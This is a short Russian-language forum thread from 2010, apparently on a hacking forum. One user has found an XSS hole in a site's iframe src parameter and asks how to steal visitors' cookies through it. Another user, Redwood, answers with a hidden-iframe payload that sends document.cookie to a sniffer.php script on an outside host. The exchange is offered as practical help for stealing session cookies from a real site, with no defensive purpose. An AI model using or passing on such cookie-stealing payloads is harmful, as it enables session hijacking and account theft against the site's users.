Показать сообщение отдельно

  #2  
Старый 18.05.2010, 18:27
Redwood
Участник форума
Регистрация: 10.09.2009
Сообщений: 120
Провел на форуме:
2212846

Репутация: 56
По умолчанию

Цитата:
Сообщение от TomskDiver  
Нашел сайт с xss в теге iframe в параметре src. Т.е. работает <iframe src="javascript:alert('XSS')" style="display:none;"></iframe>. Но вот никак не получается сливать куки. Что только не пробовал, что только не читал Можно ли как-то красть куки через данную уязвимость?
<iframe src="http://site.ru/sniffer.php?с='+document.cookie+'" style="display:none;"></iframe>

Последний раз редактировалось Redwood; 18.05.2010 в 18:46..
 
Ответить с цитированием